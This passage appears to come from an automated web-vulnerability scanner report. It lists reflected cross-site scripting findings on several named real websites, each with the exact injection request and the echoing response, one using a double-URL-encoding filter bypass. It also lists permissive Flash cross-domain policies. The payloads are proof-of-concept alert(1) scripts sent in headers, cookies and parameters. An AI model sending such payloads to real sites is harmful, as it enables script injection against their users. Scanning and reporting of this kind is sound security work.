Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.courts.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=55832<script>alert(1)</script>0884fff0392

Response

HTTP/1.1 404 OK
Date: Tue, 03 May 2011 20:49:09 GMT
Expires: Tue, 03 May 2011 20:49:09 GMT
Content-Length: 697
Content-Type: text/html

<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>404 Not Found</H1>
<P>
<STRONG>User:</strong> 173.193.214.243 : 51032<BR>
<STRONG>Domn:</strong> WWW.COURTS.INFO<BR>
<STRONG>Host:</s
...[SNIP]...
<BR>
Referer: http://www.google.com/search?hl=en&q=55832<script>alert(1)</script>0884fff0392<BR>
...[SNIP]...

6.108. http://www.courts.info/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.courts.info
Path:   /favicon.ico

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 34fc6<script>alert(1)</script>04839b2ad02 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.334fc6<script>alert(1)</script>04839b2ad02
Host: www.courts.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 OK
Date: Tue, 03 May 2011 20:49:06 GMT
Expires: Tue, 03 May 2011 20:49:06 GMT
Content-Length: 645
Content-Type: text/html

<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>404 Not Found</H1>
<P>
<STRONG>User:</strong> 173.193.214.243 : 50920<BR>
<STRONG>Domn:</strong> WWW.COURTS.INFO<BR>
<STRONG>Host:</s
...[SNIP]...
<BR>
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.334fc6<script>alert(1)</script>04839b2ad02<BR>
...[SNIP]...

6.109. http://www.democratsenators.org/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.democratsenators.org
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 221fc<script>alert(1)</script>2dfd3bdfab3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.democratsenators.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=221fc<script>alert(1)</script>2dfd3bdfab3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=369BEF78AF569E8FE72068A8BEA3D26B-n3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 04 May 2011 02:15:27 GMT
Set-Cookie: Coyote-2-aae531e=aae52cb:0; path=/
Content-Length: 1322

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
</script>2dfd3bdfab3'>http://www.google.com/search?hl=en&q=221fc<script>alert(1)</script>2dfd3bdfab3</a>
...[SNIP]...

6.110. http://www.democratsenators.org/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.democratsenators.org
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64812'><script>alert(1)</script>50bbdc68680 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.democratsenators.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=64812'><script>alert(1)</script>50bbdc68680

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=020D993D49405BD7D59DFB29D036AEB3-n2; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 04 May 2011 02:15:27 GMT
Set-Cookie: Coyote-2-aae531e=aae52ca:0; path=/
Content-Length: 1326

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=64812'><script>alert(1)</script>50bbdc68680'>
...[SNIP]...

6.111. http://www.jpeterman.com/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.jpeterman.com
Path:   /favicon.ico

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 60bbd--><script>alert(1)</script>e8e97a34f5d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.360bbd--><script>alert(1)</script>e8e97a34f5d
Host: www.jpeterman.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private, no-store
Content-Length: 10719
Content-Type: text/html; charset=utf-8
Expires: Tue, 03 May 2011 01:20:01 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ThePage_ECommerce_STATE=qY1Y4zgsGyT50k21Hhrbdg; path=/
Set-Cookie: SessModDt=5/3/2011 6:20:01 PM; expires=Tue, 04-May-2021 01:20:01 GMT; path=/
Date: Wed, 04 May 2011 01:20:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Page: /404.rsp?404http://www.jpeterman.com:80/favicon.ico Url: http://ww
...[SNIP]...
<!-- IP: 173.193.214.243 User: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.360bbd--><script>alert(1)</script>e8e97a34f5d -->
...[SNIP]...

6.112. http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/cnetnews/300x250/cnetnews_atf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f77e"><script>alert(1)</script>2c599ac421f was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb95f77e"><script>alert(1)</script>2c599ac421f; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAiY25ldG5ld3MiLCAgYWQ6ICAgICAgICAgICAyOTkwMjcwLCAgbmV0d29yazogICAgICAiaG91c2UiLCAgc2l6ZTogICAgICAgICAiMzAweDI1MCIsICBmcmVxOiAgICAgICAgICIxLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiMDRiOWJiMjMtZTQ1YS00YmUxLTgxZGMtOGM3NDViY2EzYjFhIiwgIHVzZXI6ICAgICAgICAgImFjNWFmZTg5LWRiZTMtNGE5OS05YzYwLTU5ZjRmYjQ5NWNiOTVmNzdlIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+MmM1OTlhYzQyMWYiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgImNuZXRuZXdzX2F0ZiIsICBkaXY6ICAgICAgICAgICIwNGI5YmIyMy1lNDVhLTRiZTEtODFkYy04Yzc0NWJjYTNiMWEiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL2Nic2ludGVyYWN0aXZlLmNvbSIsICBlbGFwc2VkOiAgICAgIDAsICBkZWNpc2lvbjogICAgICJhZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDExMSwgIGFjY291bnRfaWQ6ICAgNjYwNjMsICBuZXR3b3JrX25hbWU6ICJIb3VzZSBBcnQiLCAgcHVibGlzaGVyX25hbWU6ICJjYnNpbnRlcmFjdGl2ZSIsICBlY3BtOiAgICAgICAgICIwLjI1IiwgIGZlY3BtOiAgICAgICAgIjAuMjUiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgImNuZXRuZXdzX2F0ZiIsICBydWxlOiAgICAgICAgICJjbmV0bmV3c19hdGYiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY4NDE3LCAiYnV5IjoxNzYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUcmlnZ2l0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2OTYxNSwgImJ1eSI6MTI0MywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY4NjYyLCAiYnV5IjoxODksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY4NzY3LCAiYnV5IjoxOTksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5MDg1LCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzM5In0=
Content-Length: 1973
Content-Type: text/html
Date: Wed, 04 May 2011 01:29:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb95f77e"><script>alert(1)</script>2c599ac421f&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

6.113. http://tracking.moon-ray.com/track.php [sess_ cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.moon-ray.com
Path:   /track.php

Issue detail

The value of the sess_ cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 120cf'%3balert(1)//3ee93f62c0a was submitted in the sess_ cookie. This input was echoed as 120cf';alert(1)//3ee93f62c0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/&s=ysv9sd684163c3y&l=www.theamericanmonk.com/&ti=The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com&r=1&t=mr_7&vid=206617815 HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_=ysv9sd684163c3y120cf'%3balert(1)//3ee93f62c0a; mr_src=mr_7

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 01:02:16 GMT
Connection: Keep-Alive
Set-Cookie: mr_src=mr_7; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 309

_mrd.cookie='sess_=ysv9sd684163c3y120cf';alert(1)//3ee93f62c0a;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='ref_=mr_7;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206618129;' + _mr_ex + ';' + 'path=/';_mrd.cookie = 't_=mr_7;' + _mr_ex + ';'+'path=/';var _mrTrackLi
...[SNIP]...

6.114. http://www.nextbigfuture.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextbigfuture.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d60d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c1fd9d84d6 was submitted in the REST URL parameter 1. This input was echoed as 8d60d"><script>alert(1)</script>6c1fd9d84d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico8d60d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c1fd9d84d6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextbigfuture.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 03:26:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash06
X-AspNet-Version: 2.0.50727
Content-Length: 200
Location: http://nextbigfuture.com/favicon.ico8d60d"><script>alert(1)</script>6c1fd9d84d6
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://nextbigfuture.com/favicon.ico8d60d"><script>alert(1)</script>6c1fd9d84d6">here</a>.</body>

6.115. http://www.nextbigfuture.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextbigfuture.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9be1c"><script>alert(1)</script>b1dc0d82006 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?9be1c"><script>alert(1)</script>b1dc0d82006=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextbigfuture.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 03:26:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash03
X-AspNet-Version: 2.0.50727
Content-Length: 203
Location: http://nextbigfuture.com/favicon.ico?9be1c"><script>alert(1)</script>b1dc0d82006=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://nextbigfuture.com/favicon.ico?9be1c"><script>alert(1)</script>b1dc0d82006=1">here</a>.</body
...[SNIP]...

6.116. http://www.pilotpentennis.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pilotpentennis.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ffb3<script>alert(1)</script>ab30ad0dce6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?4ffb3<script>alert(1)</script>ab30ad0dce6=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pilotpentennis.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 04 May 2011 02:02:08 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 265
Location: http://www.newhavenopen.com/favicon.ico?4ffb3<script>alert(1)</script>ab30ad0dce6=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.newhavenopen.com/favicon.ico?4ffb3<script>alert(1)</script>ab30ad0dce6=1">http://www.newhavenopen.com/favicon.ico?4ffb3<script>alert(1)</script>ab30ad0dce6=1</a>
...[SNIP]...

6.117. http://www.pilotpentennis.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pilotpentennis.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51cba"><script>alert(1)</script>6765bf89c5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?51cba"><script>alert(1)</script>6765bf89c5c=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pilotpentennis.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 04 May 2011 02:02:08 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 269
Location: http://www.newhavenopen.com/favicon.ico?51cba"><script>alert(1)</script>6765bf89c5c=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.newhavenopen.com/favicon.ico?51cba"><script>alert(1)</script>6765bf89c5c=1">http://www.newhavenopen.com/favico
...[SNIP]...

6.118. http://www.safecu.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.safecu.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63257"><script>alert(1)</script>8571f9c9a7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico63257"><script>alert(1)</script>8571f9c9a7a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.safecu.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object Moved
Server: NS_6.1
Location: https://www.safecu.org/favicon.ico63257"><script>alert(1)</script>8571f9c9a7a
Content Type: text/html
Cache Control: private
Connection: close

<head><body> This object may be found <a HREF="https://www.safecu.org/favicon.ico63257"><script>alert(1)</script>8571f9c9a7a">here</a> </body>

6.119. http://www.safecu.org/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.safecu.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd1cb"><script>alert(1)</script>b00754852b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?fd1cb"><script>alert(1)</script>b00754852b8=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.safecu.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object Moved
Server: NS_6.1
Location: https://www.safecu.org/favicon.ico?fd1cb"><script>alert(1)</script>b00754852b8=1
Content Type: text/html
Cache Control: private
Connection: close

<head><body> This object may be found <a HREF="https://www.safecu.org/favicon.ico?fd1cb"><script>alert(1)</script>b00754852b8=1">here</a> </body>

7. Flash cross-domain policy  previous  next
There are 384 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Wed, 04 May 2011 01:28:55 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.2. http://admeld.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admeld.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 05-May-2011 01:28:58 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

